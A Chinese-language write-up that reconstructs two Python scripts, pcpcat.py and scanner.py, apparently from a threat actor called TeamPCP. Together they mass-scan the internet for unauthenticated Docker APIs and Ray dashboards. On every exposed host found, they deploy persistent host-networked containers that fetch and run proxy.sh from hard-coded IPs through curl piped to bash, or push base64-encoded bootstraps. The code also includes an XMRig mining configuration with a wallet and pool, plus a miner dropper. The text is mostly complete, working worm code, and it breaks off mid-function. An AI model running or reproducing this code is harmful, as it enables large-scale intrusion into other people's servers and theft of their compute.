pcpcat.py脚本主要用来在互联网上大规模发现暴露的Docker API、Ray管理界面,并自动部署恶意容器或Ray 任务(云蠕虫式扩散)。其行为包括:(1).从公网或 GitHub(如 DeadCatx3)等拉取大量CIDR,对大量IP做并行扫描(常见 Docker、Ray 端口)。(2).校验端点是否真的可被利用(未授权管理 API),然后通过 API 远程创建负载。(3).Docker:拉取Alpine镜像,启动宿主机网络、自动重启的容器,在容器内拉取并执行远程脚本(与 proxy.sh 拉取命令一致)。 (4).Ray:提交任务,执行 base64 编码的引导载荷(可含挖矿等)。  脚本参考代码如下:

# -*- coding: utf-8 -*-# =============================================================================# pcpcat.py - TeamPCP 大流量互联网扫描与部署:发现暴露的 Docker API / Ray,并自动部署恶意容器或任务# 根据“Analysis of pcpcat.py”功能描述还原:大规模发现、自动校验、无交互部署、重启策略持久化# =============================================================================# 设计:云蠕虫式——将配置不当的编排端点转化为分布式立足点,无需凭据,仅利用暴露的管理接口# =============================================================================
import&nbsp;urllib.requestimport&nbsp;urllib.errorimport&nbsp;sslimport&nbsp;jsonimport&nbsp;socketimport&nbsp;ipaddressimport&nbsp;base64import&nbsp;concurrent.futures
# 拉取并执行 proxy.sh 的地址(与 proxy.sh、scanner 一致)PROXY_SCRIPT_URL =&nbsp;"http://67.217.57.240:666/files/proxy.sh"PROXY_SCRIPT_URL_ALT =&nbsp;"http://44.252.85.168:666/files/proxy.sh"
# 公网 CIDR 来源(图中:从 public provider lists 获取大量 CIDR)# 示例:云厂商公布的 IP 段或 DeadCatx3 等列表CIDR_SOURCES = [&nbsp; &nbsp;&nbsp;"https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt",&nbsp; &nbsp;&nbsp;# 可扩展:AWS/GCP/Azure 等 IP 范围 JSON]FALLBACK_CIDRS = ["0.0.0.0/0"]
# Docker / Ray 常见端口DOCKER_PORTS = [2375,&nbsp;2376]RAY_PORTS = [8265,&nbsp;6379]
# 并行扫描线程数MAX_WORKERS =&nbsp;64CONNECT_TIMEOUT =&nbsp;2API_TIMEOUT =&nbsp;5
ctx = ssl.create_default_context()ctx.check_hostname =&nbsp;Falsectx.verify_mode = ssl.CERT_NONE

def&nbsp;get_docker_startup_script():&nbsp; &nbsp;&nbsp;"""返回在容器内拉取并执行 proxy.sh 的 shell 脚本(与野外样本一致)。"""&nbsp; &nbsp;&nbsp;return&nbsp;f'''/bin/shecho "https://t.me/Persy_PCP was herehttps://t.me/teampcp"apk add --no-cache curl bash python3 >/dev/null 2>&1curl -fsSL "{PROXY_SCRIPT_URL}" | bash'''

def&nbsp;deploy_to_docker(ip, port):&nbsp; &nbsp;&nbsp;"""&nbsp; &nbsp; 对暴露的 Docker API (ip:port) 部署恶意容器。&nbsp; &nbsp; 行为:拉取 Alpine 镜像,启动宿主机网络、自动重启的容器,容器内拉取并执行远程脚本(proxy.sh)。&nbsp; &nbsp; """&nbsp; &nbsp; endpoint =&nbsp;f"{ip}:{port}"&nbsp; &nbsp; base_url =&nbsp;f"http://{ip}:{port}"&nbsp; &nbsp; script = get_docker_startup_script().strip().replace("\n",&nbsp;" ")&nbsp; &nbsp; body = {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Image":&nbsp;"alpine:latest",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Cmd": ["/bin/sh",&nbsp;"-c", script],&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"HostConfig": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"NetworkMode":&nbsp;"host",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"RestartPolicy": {"Name":&nbsp;"always"},&nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;f"{base_url}/containers/create",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data=json.dumps(body).encode(),&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; headers={"Content-Type":&nbsp;"application/json"},&nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; create_res = json.loads(resp.read().decode())&nbsp; &nbsp; &nbsp; &nbsp; cid = create_res.get("Id")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;cid:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False&nbsp; &nbsp; &nbsp; &nbsp; start_req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;f"{base_url}/containers/{cid}/start",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data=b"",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp; urllib.request.urlopen(start_req, context=ctx, timeout=API_TIMEOUT)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;get_ray_bootstrap_b64():&nbsp; &nbsp;&nbsp;"""返回 Ray 任务中执行的 base64 引导载荷"""&nbsp; &nbsp;&nbsp;# 占位:解码后可为拉取 proxy.sh 或挖矿脚本;真实样本中为完整编码&nbsp; &nbsp; script =&nbsp;"import urllib.request, ssl; ctx=ssl.create_default_context(); ctx.check_hostname=False; ctx.verify_mode=0; exec(urllib.request.urlopen('"&nbsp;+ PROXY_SCRIPT_URL +&nbsp;"', context=ctx).read().decode())"&nbsp; &nbsp;&nbsp;return&nbsp;base64.b64encode(script.encode()).decode()

def&nbsp;deploy_to_ray(ip, port):&nbsp; &nbsp;&nbsp;"""&nbsp; &nbsp; 向 Ray dashboard 提交任务,执行 base64 编码的引导载荷。&nbsp; &nbsp; Ray 常见 API:POST /api/jobs 或 /api/serve/applications 等,此处为占位路径。&nbsp; &nbsp; """&nbsp; &nbsp; base_url =&nbsp;f"http://{ip}:{port}"&nbsp; &nbsp; bootstrap_b64 = get_ray_bootstrap_b64()&nbsp; &nbsp;&nbsp;# Ray 1.x / 2.x 提交 job 的请求体格式因版本而异,此处为合理推测&nbsp; &nbsp; body = {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"entrypoint":&nbsp;f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\"",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"runtime_env": {},&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;path&nbsp;in&nbsp;["/api/jobs",&nbsp;"/api/version",&nbsp;"/"]:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;f"{base_url}{path}",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data=json.dumps(body).encode(),&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; headers={"Content-Type":&nbsp;"application/json"},&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;resp.getcode()&nbsp;in&nbsp;(200,&nbsp;201,&nbsp;202):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;urllib.error.HTTPError&nbsp;as&nbsp;e:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;e.code&nbsp;in&nbsp;(200,&nbsp;201,&nbsp;202):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass&nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;fetch_cidr_blocks():&nbsp; &nbsp;&nbsp;"""从公网 provider 列表获取大量 CIDR(图中:acquires massive CIDR blocks from public provider lists)。"""&nbsp; &nbsp; all_cidrs = []&nbsp; &nbsp;&nbsp;for&nbsp;url&nbsp;in&nbsp;CIDR_SOURCES:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(url)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=15)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; text = resp.read().decode("utf-8", errors="ignore")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;line&nbsp;in&nbsp;text.splitlines():&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; line = line.strip()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;line&nbsp;and&nbsp;not&nbsp;line.startswith("#"):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; all_cidrs.append(line)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue&nbsp; &nbsp;&nbsp;return&nbsp;all_cidrs&nbsp;if&nbsp;all_cidrs&nbsp;else&nbsp;FALLBACK_CIDRS

def&nbsp;expand_cidr(cidr, limit=2048):&nbsp; &nbsp;&nbsp;"""将 CIDR 展开为 IP 列表,限制数量以控制扫描规模。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; net = ipaddress.ip_network(cidr, strict=False)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[str(ip)&nbsp;for&nbsp;ip&nbsp;in&nbsp;list(net.hosts())[:limit]]&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[]

def&nbsp;check_port(ip, port):&nbsp; &nbsp;&nbsp;"""检测 ip:port 是否开放。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&nbsp; &nbsp; &nbsp; &nbsp; s.settimeout(CONNECT_TIMEOUT)&nbsp; &nbsp; &nbsp; &nbsp; r = s.connect_ex((ip, port))&nbsp; &nbsp; &nbsp; &nbsp; s.close()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;r ==&nbsp;0&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;verify_docker(ip, port):&nbsp; &nbsp;&nbsp;"""校验是否为可滥用的未授权 Docker API。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(f"http://{ip}:{port}/version")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;resp.getcode() ==&nbsp;200&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;verify_ray(ip, port):&nbsp; &nbsp;&nbsp;"""校验是否为可用的 Ray dashboard / API。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(f"http://{ip}:{port}/")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;resp.getcode()&nbsp;in&nbsp;(200,&nbsp;401,&nbsp;403)&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;scan_one(args):&nbsp; &nbsp;&nbsp;"""单任务:对 (ip, port, kind) 做端口与 API 校验,返回可攻击目标。"""&nbsp; &nbsp; ip, port, kind = args&nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;check_port(ip, port):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;None&nbsp; &nbsp;&nbsp;if&nbsp;kind ==&nbsp;"docker"&nbsp;and&nbsp;verify_docker(ip, port):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;(ip, port,&nbsp;"docker")&nbsp; &nbsp;&nbsp;if&nbsp;kind ==&nbsp;"ray"&nbsp;and&nbsp;verify_ray(ip, port):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;(ip, port,&nbsp;"ray")&nbsp; &nbsp;&nbsp;return&nbsp;None

def&nbsp;main():&nbsp; &nbsp;&nbsp;# 1) 大规模发现:获取 CIDR,展开为大量 IP,并行扫描 Docker / Ray 端口&nbsp; &nbsp; cidrs = fetch_cidr_blocks()&nbsp; &nbsp; tasks = []&nbsp; &nbsp;&nbsp;for&nbsp;cidr&nbsp;in&nbsp;cidrs:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;ip&nbsp;in&nbsp;expand_cidr(cidr):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;port&nbsp;in&nbsp;DOCKER_PORTS:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tasks.append((ip, port,&nbsp;"docker"))&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;port&nbsp;in&nbsp;RAY_PORTS:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tasks.append((ip, port,&nbsp;"ray"))
&nbsp; &nbsp; found = []&nbsp; &nbsp;&nbsp;with&nbsp;concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)&nbsp;as&nbsp;ex:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;res&nbsp;in&nbsp;concurrent.futures.as_completed([ex.submit(scan_one, t)&nbsp;for&nbsp;t&nbsp;in&nbsp;tasks]):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; r = res.result()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;r:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; found.append(r)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass
&nbsp; &nbsp;&nbsp;# 2) 无交互部署:对每个验证通过的目标调用对应部署逻辑,持久化依赖 restart policy(Docker)/ job(Ray)&nbsp; &nbsp;&nbsp;for&nbsp;ip, port, kind&nbsp;in&nbsp;found:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;kind ==&nbsp;"docker":&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; deploy_to_docker(ip, port)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;elif&nbsp;kind ==&nbsp;"ray":&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; deploy_to_ray(ip, port)

if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; main()

#

#

scanner.py脚本功能

#

scanner.py脚本主要用来发现配置不当的Docker API 与 Ray dashboard,并可选部署恶意负载或挖矿。其行为包括:(1).从 GitHub 账号 DeadCatx3 等处下载 CIDR 列表,用于扫描目标段。(2).包含与 pcpcat 类似的 **Docker 部署逻辑**:生成拉取并执行 proxy.sh 的启动脚本(与野外容器内执行的命令一致),对指定 ip:port 进行部署。(3).“boring” 服务器选项:会投递 base64 编码的引导脚本;解码后为挖矿相关(如 XMRig)。以下是脚本的部分参考代码:

# -*- coding: utf-8 -*-# =============================================================================# scanner.py - TeamPCP 扫描器:发现配置不当的 Docker API 与 Ray dashboard,并部署 proxy 或挖矿# =============================================================================
import&nbsp;urllib.requestimport&nbsp;urllib.errorimport&nbsp;sslimport&nbsp;jsonimport&nbsp;socketimport&nbsp;ipaddressimport&nbsp;threadingimport&nbsp;base64
# 下载服务器(与 proxy.sh 一致)PROXY_SCRIPT_URL =&nbsp;"http://67.217.57.240:666/files/proxy.sh"# 备用PROXY_SCRIPT_URL_ALT =&nbsp;"http://44.252.85.168:666/files/proxy.sh"
# DeadCatx3 GitHub:CIDR 列表(报告中未给出具体 repo 路径,此处为占位)CIDR_LIST_URL =&nbsp;"https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt"# 若 GitHub 不可用,可使用内置或其它源FALLBACK_CIDRS = ["0.0.0.0/0"]
# Docker / Ray 常见暴露端口DOCKER_PORTS = [2375,&nbsp;2376]RAY_PORTS = [8265,&nbsp;6379]
ctx = ssl.create_default_context()ctx.check_hostname =&nbsp;Falsectx.verify_mode = ssl.CERT_NONE
# -----------------------------------------------------------------------------# mine.sh 配置与用法(图中:XMRig 安装脚本)# mine.sh 用法:./miner | ./miner uninstall | ./miner status | ./miner logs | ./miner run | --help | --version# -----------------------------------------------------------------------------MINE_CONFIG = {&nbsp; &nbsp;&nbsp;"WALLET_ADDRESS":&nbsp;"87ttvHnjsno56u3zJV26E6cu6Cfro8ASBSpmAzi6FzGp603KXsoB2r8aR2k82Pmg2SLWHtHCKjrHeHUcZUneqEBFRnkbaz5",&nbsp; &nbsp;&nbsp;"WORKER_NAME":&nbsp;"${WORKER_NAME:-$(hostname)}",&nbsp; &nbsp;&nbsp;"POOL_URL":&nbsp;"pool.supportxmr.com:443",&nbsp; &nbsp;&nbsp;"XMRIG_VERSION":&nbsp;"6.25.0",&nbsp; &nbsp;&nbsp;"CPU_PERCENT":&nbsp;"${CPU_PERCENT:-60}",&nbsp; &nbsp;&nbsp;"BINARY_NAME":&nbsp;"miner",}

def&nbsp;get_docker_startup_script():&nbsp; &nbsp;&nbsp;"""返回在 Docker 容器内拉取并执行 proxy.sh 的启动脚本(与野外样本一致)。"""&nbsp; &nbsp;&nbsp;return&nbsp;f'''/bin/shecho "https://t.me/Persy_PCP was herehttps://t.me/teampcp"apk add --no-cache curl bash python3 >/dev/null 2>&1curl -fsSL "{PROXY_SCRIPT_URL}" | bash'''

def&nbsp;deploy_to_docker(ip, port, use_boring=False):&nbsp; &nbsp;&nbsp;"""&nbsp; &nbsp; 对暴露的 Docker API (ip:port) 部署恶意容器。&nbsp; &nbsp; use_boring=True 时部署挖矿引导(base64 xmrig)而非 proxy.sh。&nbsp; &nbsp; """&nbsp; &nbsp; endpoint =&nbsp;f"{ip}:{port}"&nbsp; &nbsp; base_url =&nbsp;f"http://{ip}:{port}"&nbsp; &nbsp;&nbsp;if&nbsp;use_boring:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# “boring” 服务器选项:投递 base64 编码的挖矿引导&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 解码后执行会写入 /tmp/miner.b64 → base64 -d → chmod +x /tmp/miner → 执行&nbsp; &nbsp; &nbsp; &nbsp; bootstrap_b64 = get_bootstrap_b64_miner()&nbsp; &nbsp; &nbsp; &nbsp; cmd = ["/bin/sh",&nbsp;"-c",&nbsp;f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\""]&nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; script = get_docker_startup_script().strip().replace("\n",&nbsp;" ")&nbsp; &nbsp; &nbsp; &nbsp; cmd = ["/bin/sh",&nbsp;"-c", script]&nbsp; &nbsp; body = {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Image":&nbsp;"alpine:latest",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Cmd": cmd,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"HostConfig": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"NetworkMode":&nbsp;"host",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"RestartPolicy": {"Name":&nbsp;"always"},&nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;f"{base_url}/containers/create",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data=json.dumps(body).encode(),&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; headers={"Content-Type":&nbsp;"application/json"},&nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=10)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; create_res = json.loads(resp.read().decode())&nbsp; &nbsp; &nbsp; &nbsp; cid = create_res.get("Id")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;cid:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False&nbsp; &nbsp; &nbsp; &nbsp; start_req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;f"{base_url}/containers/{cid}/start",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data=b"",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp; urllib.request.urlopen(start_req, context=ctx, timeout=5)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;get_bootstrap_b64_miner():&nbsp; &nbsp;&nbsp;"""&nbsp; &nbsp; 返回“挖矿引导”的 base64 字符串&nbsp; &nbsp; 此处返回占位或从远程拉取的b64,真实样本中为完整编码的引导脚本。&nbsp; &nbsp; """&nbsp; &nbsp;&nbsp;# 占位:一段仅写 /tmp/miner.b64 并解码执行的最小示例&nbsp; &nbsp; bootstrap_script =&nbsp;"""import base64, subprocess, osp = os.environ.get('MINER_B64', '')if p:&nbsp; &nbsp; open('/tmp/miner.b64', 'wb').write(base64.b64decode(p))&nbsp; &nbsp; subprocess.run(['sh', '-c', 'base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner && rm -f /tmp/miner.b64 && /tmp/miner'], check=False)"""&nbsp; &nbsp;&nbsp;return&nbsp;base64.b64encode(bootstrap_script.encode()).decode()

def&nbsp;fetch_cidr_list():&nbsp; &nbsp;&nbsp;"""从 GitHub DeadCatx3 拉取 CIDR 列表;失败则返回备用网段。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(CIDR_LIST_URL)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=15)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; text = resp.read().decode("utf-8", errors="ignore")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[line.strip()&nbsp;for&nbsp;line&nbsp;in&nbsp;text.splitlines()&nbsp;if&nbsp;line.strip()]&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;FALLBACK_CIDRS

def&nbsp;expand_cidr(cidr):&nbsp; &nbsp;&nbsp;"""将单个 CIDR 展开为 IP 列表(示例中可限制数量以控制扫描规模)。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; net = ipaddress.ip_network(cidr, strict=False)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[str(ip)&nbsp;for&nbsp;ip&nbsp;in&nbsp;net.hosts()][:1024]&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[]

def&nbsp;check_port(ip, port, timeout=2):&nbsp; &nbsp;&nbsp;"""检测 ip:port 是否开放。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&nbsp; &nbsp; &nbsp; &nbsp; s.settimeout(timeout)&nbsp; &nbsp; &nbsp; &nbsp; r = s.connect_ex((ip, port))&nbsp; &nbsp; &nbsp; &nbsp; s.close()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;r ==&nbsp;0&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;check_docker_api(ip, port):&nbsp; &nbsp;&nbsp;"""检测是否为未授权 Docker API(简单 GET /version)。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(f"http://{ip}:{port}/version")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=5)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;resp.getcode() ==&nbsp;200&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;check_ray_dashboard(ip, port):&nbsp; &nbsp;&nbsp;"""检测是否为 Ray dashboard(简单 GET)。"""&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(f"http://{ip}:{port}/")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=5)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;resp.getcode()&nbsp;in&nbsp;(200,&nbsp;401,&nbsp;403)&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;scan_and_deploy(use_boring=False):&nbsp; &nbsp;&nbsp;"""&nbsp; &nbsp; 主流程:拉取 CIDR → 扫描 Docker / Ray 端口 → 对可用目标执行 deploy_to_docker(或 Ray)。&nbsp; &nbsp; use_boring=True 时对 Docker 目标部署挖矿引导(base64 xmrig),否则部署 proxy.sh。&nbsp; &nbsp; """&nbsp; &nbsp; cidrs = fetch_cidr_list()&nbsp; &nbsp; found = []&nbsp; &nbsp;&nbsp;for&nbsp;cidr&nbsp;in&nbsp;cidrs:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;ip&nbsp;in&nbsp;expand_cidr(cidr):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;port&nbsp;in&nbsp;DOCKER_PORTS:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;check_port(ip, port)&nbsp;and&nbsp;check_docker_api(ip, port):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; found.append((ip, port,&nbsp;"docker"))&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 